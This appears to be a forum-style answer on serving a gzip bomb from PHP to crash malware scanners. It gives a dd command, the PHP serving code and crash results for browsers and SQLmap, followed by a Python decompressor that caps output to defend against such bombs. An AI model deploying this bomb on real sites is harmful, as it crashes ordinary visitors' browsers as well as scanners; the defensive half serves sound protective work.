I found a ready-to-use solution on GitHub.
It’s called GzipBloat and it does exactly what I was looking for.
First you generate a 10GB gzip file (10MB after first compression) filled with input from /dev/zero:

```
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
```
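In PHP you then set the content encoding and send the gzip file to the client:

```php
<?php
// Tell the client the body is gzip-encoded and how many compressed bytes follow
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
// Turn off output buffering
if (ob_get_level()) ob_end_clean();
// Stream the pre-compressed file as-is
readfile('10G.gzip');
```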
Results (Win10):
- IE11: Memory rises, then IE crashes
- Chrome 52: Memory rises, error is shown
- Edge 38: Memory rises, then drops and nothing is displayed (seems to load forever)
- Nikto: Scans at regular speed, no memory problems
- SQLmap: High memory then crashes
solved PHP – Is it possible to implement a gzip bomb in PHP for malware scanners
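
Seen from the receiving side, the crashes listed above come from inflating the body without any limit. The following is an added example (not part of the original answer or of GzipBloat) of a gzip reader that aborts once the output size or the expansion ratio passes a limit; the function names and the limit values are assumptions chosen for illustration.

```python
import gzip
import io
import zlib


class DecompressionLimitExceeded(Exception):
    """Raised when a compressed body expands past the configured limits."""


def bounded_gunzip(stream, max_output=10 * 2**20, max_ratio=200,
                   ratio_floor=2**20, chunk_size=64 * 1024):
    """Inflate a gzip stream piece by piece, aborting on bomb-like expansion.

    All limits are illustrative defaults (assumptions), not values from the page.
    """
    inflater = zlib.decompressobj(wbits=31)  # wbits=31 selects the gzip wrapper
    out = bytearray()
    consumed = 0  # compressed bytes read so far
    while not inflater.eof:
        chunk = stream.read(chunk_size)
        if not chunk:
            raise ValueError("truncated gzip stream")
        consumed += len(chunk)
        pending = chunk
        while pending and not inflater.eof:
            # max_length caps what a single call may produce; input that has
            # not been processed yet is handed back in unconsumed_tail.
            out += inflater.decompress(pending, chunk_size)
            pending = inflater.unconsumed_tail
            if len(out) > max_output:
                raise DecompressionLimitExceeded(
                    "output exceeds %d bytes" % max_output)
            # The ratio check only applies above ratio_floor, so small but
            # highly compressible bodies are not rejected.
            if len(out) > ratio_floor and len(out) > max_ratio * consumed:
                raise DecompressionLimitExceeded(
                    "expansion ratio above %d:1" % max_ratio)
    return bytes(out)


def is_bomb(body, **limits):
    """Return True if the gzip body trips one of the limits."""
    try:
        bounded_gunzip(io.BytesIO(body), **limits)
    except DecompressionLimitExceeded:
        return True
    return False
```

Memory use stays bounded by `max_output` plus one chunk, because the stream is rejected while it is still being inflated rather than after the full body has been expanded.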